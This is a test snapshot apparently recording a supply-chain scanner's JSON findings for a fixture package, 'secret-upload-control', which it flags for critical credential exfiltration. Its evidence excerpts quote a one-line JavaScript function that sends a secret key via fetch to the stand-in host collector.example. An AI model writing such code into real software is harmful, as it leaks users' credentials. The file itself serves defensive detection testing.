tests/workflows/tests/snapshots/install_source_analysis__audit_credential_exfiltration_evidence.snap
---
source: tests/workflows/tests/install_source_analysis.rs
expression: envelope
---
{
  "success": true,
  "behavioral_coverage": {
    "complete": true,
    "scanned_packages": 1,
    "partial_packages": 0,
    "unavailable_packages": 0,
    "packages": []
  },
  "manager": "lpm",
  "degraded": false,
  "osv_degraded": false,
  "osv_degraded_reason": null,
  "scanned": 1,
  "checked_lpm": 0,
  "packages_with_issues": 1,
  "total_issues": 3,
  "total_capabilities": 1,
  "osv_vulnerabilities": 0,
  "counts": {
    "critical": 1,
    "high": 0,
    "moderate": 0,
    "low": 0,
    "info": 2
  },
  "packages": [
    {
      "name": "secret-upload-control",
      "version": "1.0.0",
      "instance_id": "[INSTANCE_ID]",
      "path": "[PACKAGE_PATH]",
      "quality_score": null,
      "capabilities": [
        {
          "rule_id": "network",
          "name": "network access",
          "policy_severity": "moderate",
          "source": "local",
          "evidence": [
            {
              "ruleId": "network",
              "path": "index.js",
              "line": 1,
              "column": 28,
              "excerpt": "function send(secretKey) { fetch('https://collector.example/upload', {headers: {'x-session': secretKey}}); }",
              "reason": "Source pattern indicates a capability; execution is not established.",
              "fileContext": "source"
            }
          ]
        }
      ],
      "issues": [
        {
          "severity": "info",
          "category": "supply-chain",
          "message": "URL literals",
          "source": "local",
          "rule_id": "url-strings",
          "evidence": [
            {
              "ruleId": "url-strings",
              "path": "index.js",
              "reason": "Source contains a URL literal.",
              "fileContext": "source"
            }
          ]
        },
        {
          "severity": "info",
          "category": "supply-chain",
          "message": "trivial package",
          "source": "local",
          "rule_id": "trivial",
          "evidence": []
        },
        {
          "severity": "critical",
          "category": "supply-chain",
          "message": "credential exfiltration",
          "source": "local",
          "rule_id": "credential-exfiltration",
          "evidence": [
            {
              "ruleId": "credential-exfiltration",
              "path": "index.js",
              "line": 1,
              "column": 28,
              "excerpt": "function send(secretKey) { fetch('https://collector.example/upload', {headers: {'x-session': secretKey}}); }",
              "reason": "Private-key or wallet-seed material flows into a network payload through supported assignments or helper calls.",
              "fileContext": "source"
            }
          ]
        }
      ]
    }
  ],
  "vulnerabilities": []
}
